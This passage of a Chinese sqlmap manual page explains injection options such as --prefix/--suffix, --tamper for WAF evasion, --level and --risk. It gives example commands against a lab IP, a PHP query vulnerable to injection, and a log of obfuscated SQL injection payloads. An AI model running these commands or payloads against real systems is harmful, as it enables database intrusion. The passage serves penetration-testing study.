style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%B3%BB%E7%BB%9F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;os<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4b\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf\uff0c\u652f\u6301\u7684\u7cfb\u7edf\u6709\uff1a<\/span><span>Linux<\/span><span>\u3001<\/span><span>Windows<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8C%87%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E5%A4%A7%E6%95%B0%E5%AD%97\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;invalid-bignum<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f60\u60f3\u6307\u5b9a\u4e00\u4e2a\u62a5\u9519\u7684\u6570\u503c\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\uff0c\u4f8b\u5982\u9ed8\u8ba4\u60c5\u51b5\u7cfb<span>id=13<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u53d8\u6210<\/span><span>id=-13<\/span><span>\u6765\u62a5\u9519\uff0c\u4f60\u53ef\u4ee5\u6307\u5b9a\u6bd4\u5982<\/span><span>id=9999999<\/span><span>\u6765\u62a5\u9519\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%8F%AA%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E9%80%BB%E8%BE%91\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u53ea\u5b9a\u65e0\u6548\u7684\u903b\u8f91<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;invalid-logical<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u539f\u56e0\u540c\u4e0a\uff0c\u53ef\u4ee5\u6307\u5b9a<span>id=13<\/span><span>\u628a\u539f\u6765\u7684<\/span><span>id=-13<\/span><span>\u7684\u62a5\u9519\u6539\u6210<\/span><span>id=13&nbsp;AND&nbsp;18=19<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%85%A5payload\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u5165payload<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;prefix,&#8211;suffix<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u6709\u4e9b\u73af\u5883\u4e2d\uff0c\u9700\u8981\u5728\u6ce8\u5165\u7684<span>payload<\/span><span>\u7684\u524d\u9762\u6216\u8005\u540e\u9762\u52a0\u4e00\u4e9b\u5b57\u7b26\uff0c\u6765\u4fdd\u8bc1<\/span><span>payload<\/span><span>\u7684\u6b63\u5e38\u6267\u884c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff0c\u4ee3\u7801\u4e2d\u662f\u8fd9\u6837\u8c03\u7528\u6570\u636e\u5e93\u7684\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$query&nbsp;=&nbsp;&#8220;SELECT&nbsp;*&nbsp;FROM&nbsp;users&nbsp;WHERE&nbsp;id=(\u2019&#8221;&nbsp;.&nbsp;$_GET[\u2019id\u2019]&nbsp;.&nbsp;&#8220;\u2019)&nbsp;LIMIT&nbsp;0,&nbsp;1&#8221;;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u65f6\u4f60\u5c31\u9700\u8981<span>&#8211;prefix<\/span><span>\u548c<\/span><span>&#8211;suffix<\/span><span>\u53c2\u6570\u4e86\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mysql\/get_str_brackets.php?id=1&#8221;&nbsp;-p&nbsp;id&nbsp;&#8211;prefix&nbsp;&#8220;\u2019)&#8221;&nbsp;&#8211;suffix&nbsp;&#8220;AND&nbsp;(\u2019abc\u2019=\u2019abc&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u6837\u6267\u884c\u7684<span>SQL<\/span><span>\u8bed\u53e5\u53d8\u6210\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$query&nbsp;=&nbsp;&#8220;SELECT&nbsp;*&nbsp;FROM&nbsp;users&nbsp;WHERE&nbsp;id=(\u20191\u2019)&nbsp;&lt;PAYLOAD&gt;&nbsp;AND&nbsp;(\u2019abc\u2019=\u2019abc\u2019)&nbsp;LIMIT&nbsp;0,&nbsp;1&#8221;;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BF%AE%E6%94%B9%E6%B3%A8%E5%85%A5%E7%9A%84%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;tamper<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9664\u4e86\u4f7f\u7528<\/span><span>CHAR()<\/span><span>\u51fd\u6570\u6765\u9632\u6b62\u51fa\u73b0\u5355\u5f15\u53f7\u4e4b\u5916\u6ca1\u6709\u5bf9\u6ce8\u5165\u7684\u6570\u636e\u4fee\u6539\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;tamper<\/span><span>\u53c2\u6570\u5bf9\u6570\u636e\u505a\u4fee\u6539\u6765\u7ed5\u8fc7<\/span><span>WAF<\/span><span>\u7b49\u8bbe\u5907\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0b\u9762\u662f\u4e00\u4e2a<span>tamper<\/span><span>\u811a\u672c\u7684\u683c\u5f0f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">#&nbsp;Needed&nbsp;imports<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">from&nbsp;lib.core.enums&nbsp;import&nbsp;PRIORITY<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">#&nbsp;Define&nbsp;which&nbsp;is&nbsp;the&nbsp;order&nbsp;of&nbsp;application&nbsp;of&nbsp;tamper&nbsp;scripts&nbsp;against<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">#&nbsp;the&nbsp;payload<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">__priority__&nbsp;=&nbsp;PRIORITY.NORMAL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">def&nbsp;tamper(payload):<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&#8221;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Description&nbsp;of&nbsp;your&nbsp;tamper&nbsp;script<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;&#8221;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;retVal&nbsp;=&nbsp;payload<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;your&nbsp;code&nbsp;to&nbsp;tamper&nbsp;the&nbsp;original&nbsp;payload<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;return&nbsp;the&nbsp;tampered&nbsp;payload<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;retVal<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u67e5\u770b&nbsp;<span>tamper\/&nbsp;<\/span><span>\u76ee\u5f55\u4e0b\u7684\u6709\u54ea\u4e9b\u53ef\u7528\u7684\u811a\u672c<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mysql\/get_int.php?id=1&#8221;&nbsp;&#8211;tamper&nbsp;tamper\/between.py,tamper\/randomcase.py,tamper\/space2comment.py&nbsp;-v&nbsp;3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[DEBUG]&nbsp;cleaning&nbsp;up&nbsp;configuration&nbsp;parameters<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[INFO]&nbsp;loading&nbsp;tamper&nbsp;script&nbsp;&#8216;between&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[INFO]&nbsp;loading&nbsp;tamper&nbsp;script&nbsp;&#8216;randomcase&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:03]&nbsp;[INFO]&nbsp;loading&nbsp;tamper&nbsp;script&nbsp;&#8216;space2comment&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1)\/**\/And\/**\/1369=7706\/**\/And\/**\/(4092=4092<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1)\/**\/AND\/**\/9267=9267\/**\/AND\/**\/(4057=4057<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1\/**\/AnD\/**\/950=7041<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[PAYLOAD]&nbsp;1\/**\/anD\/**\/(SELeCt\/**\/9921\/**\/fROm(SELeCt\/**\/counT(*),CONCAT(cHar(<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">58,117,113,107,58),(SELeCt\/**\/(case\/**\/whEN\/**\/(9921=9921)\/**\/THeN\/**\/1\/**\/elsE\/**\/0\/**\/<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x\/**\/fROm\/**\/information_schema.tables\/**\/<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">group\/**\/bY\/**\/x)a)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:04]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">clause&#8217;&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%8E%A2%E6%B5%8B\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u63a2\u6d4b<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8E%A2%E6%B5%8B%E7%AD%89%E7%BA%A7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u63a2\u6d4b\u7b49\u7ea7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;level<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5171\u6709\u4e94\u4e2a\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u4e3a<span>1<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u4f7f\u7528\u7684<\/span><span>payload<\/span><span>\u53ef\u4ee5\u5728<\/span><span>xml\/payloads.xml<\/span><span>\u4e2d\u770b\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6839\u636e\u76f8\u5e94\u7684\u683c\u5f0f\u6dfb\u52a0\u81ea\u5df1\u7684<\/span><span>payload<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e2a\u53c2\u6570\u4e0d\u4ec5\u5f71\u54cd\u4f7f\u7528\u54ea\u4e9b<span>payload<\/span><span>\u540c\u65f6\u4e5f\u4f1a\u5f71\u54cd\u6d4b\u8bd5\u7684\u6ce8\u5165\u70b9\uff0c<\/span><span>GET<\/span><span>\u548c<\/span><span>POST<\/span><span>\u7684\u6570\u636e\u90fd\u4f1a\u6d4b\u8bd5\uff0c<\/span><span>HTTP&nbsp;Cookie<\/span><span>\u5728<\/span><span>level<\/span><span>\u4e3a<\/span><span>2<\/span><span>\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\uff0c<\/span><span>HTTP&nbsp;User-Agent\/Referer<\/span><span>\u5934\u5728<\/span><span>level<\/span><span>\u4e3a<\/span><span>3<\/span><span>\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u603b\u4e4b\u5728\u4f60\u4e0d\u786e\u5b9a\u54ea\u4e2a<span>payload<\/span><span>\u6216\u8005\u53c2\u6570\u4e3a\u6ce8\u5165\u70b9\u7684\u65f6\u5019\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u5168\u9762\u6027\uff0c\u5efa\u8bae\u4f7f\u7528\u9ad8\u7684<\/span><span>level<\/span><span>\u503c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A3%8E%E9%99%A9%E7%AD%89%E7%BA%A7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u98ce\u9669\u7b49\u7ea7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;risk<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5171\u6709\u56db\u4e2a\u98ce\u9669\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u662f<span>1<\/span><span>\u4f1a\u6d4b\u8bd5\u5927\u90e8\u5206\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c<\/span><span>2<\/span><span>\u4f1a\u589e\u52a0\u57fa\u4e8e\u4e8b\u4ef6\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c<\/span><span>3<\/span><span>\u4f1a\u589e\u52a0<\/span><span>OR<\/span><span>\u8bed\u53e5\u7684<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u4f8b\u5982\u5728<span>UPDATE<\/span><span>\u7684\u8bed\u53e5\u4e2d\uff0c\u6ce8\u5165\u4e00\u4e2a<\/span><span>OR<\/span><span>\u7684\u6d4b\u8bd5\u8bed\u53e5\uff0c\u53ef\u80fd\u5bfc\u81f4\u66f4\u65b0\u7684\u6574\u4e2a\u8868\uff0c\u53ef\u80fd\u9020\u6210\u5f88\u5927\u7684\u98ce\u9669\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6d4b\u8bd5\u7684\u8bed\u53e5\u540c\u6837\u53ef\u4ee5\u5728<span>xml\/payloads.xml<\/span><span>\u4e2d\u627e\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u81ea\u884c\u6dfb\u52a0<\/span><span>payload<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A1%B5%E9%9D%A2%E6%AF%94%E8%BE%83\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u9875\u9762\u6bd4\u8f83<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;string,&#8211;not-string,&#8211;regexp,&#8211;code<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u901a\u8fc7\u5224\u65ad\u8fd4\u56de\u9875\u9762\u7684\u4e0d\u540c\u6765\u5224\u65ad\u771f\u5047\uff0c\u4f46\u6709\u65f6\u5019\u8fd9\u4f1a\u4ea7\u751f\u8bef\u5dee\uff0c\u56e0\u4e3a\u6709\u7684\u9875\u9762\u5728\u6bcf\u6b21\u5237\u65b0\u7684\u65f6\u5019\u90fd\u4f1a\u8fd4\u56de\u4e0d\u540c\u7684\u4ee3\u7801\uff0c\u6bd4\u5982\u9875\u9762\u5f53\u4e2d&nbsp;\u5305\u542b\u4e00\u4e2a\u52a8\u6001\u7684\u5e7f\u544a\u6216\u8005\u5176\u4ed6\u5185\u5bb9\uff0c\u8fd9\u4f1a\u5bfc\u81f4<\/span><span>sqlmap<\/span><span>\u7684\u8bef\u5224\u3002\u6b64\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u4e2a\u5b57\u7b26\u4e32\u6216\u8005\u4e00\u6bb5\u6b63\u5219\u5339\u914d\uff0c\u5728\u539f\u59cb\u9875\u9762\u4e0e\u771f\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u5b58\u5728\u7684\u5b57\u7b26&nbsp;\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u4e0d\u5b58\u5728\uff08\u4f7f\u7528<\/span><span>&#8211;string<\/span><span>\u53c2\u6570\u6dfb\u52a0\u5b57\u7b26\u4e32\uff0c<\/span><span>&#8211;regexp<\/span><span>\u6dfb\u52a0\u6b63\u5219\uff09\uff0c\u540c\u65f6\u7528\u6237\u53ef\u4ee5\u63d0\u4f9b\u4e00\u6bb5\u5b57\u7b26\u4e32\u5728\u539f\u59cb\u9875\u9762\u4e0e\u771f\u6761\u4ef6\u4e0b\u7684\u9875\u9762\u90fd\u4e0d&nbsp;\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u9519\u8bef\u9875\u9762\u4e2d\u5b58\u5728\u7684\u5b57\u7b26\u4e32\uff08<\/span><span>&#8211;not-string<\/span><span>\u6dfb\u52a0\uff09\u3002\u7528\u6237\u4e5f\u53ef\u4ee5\u63d0\u4f9b\u771f\u4e0e\u5047\u6761\u4ef6\u8fd4\u56de\u7684<\/span><span>HTTP<\/span><span>\u72b6\u6001\u7801\u4e0d\u4e00\u6837\u6765\u6ce8\u5165\uff0c\u4f8b\u5982\uff0c\u54cd\u5e94&nbsp;<\/span><span>200<\/span><span>\u7684\u65f6\u5019\u4e3a\u771f\uff0c\u54cd\u5e94<\/span><span>401<\/span><span>\u7684\u65f6\u5019\u4e3a\u5047\uff0c\u53ef\u4ee5\u6dfb\u52a0\u53c2\u6570<\/span><span>&#8211;code=200<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;text-only,&#8211;titles<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 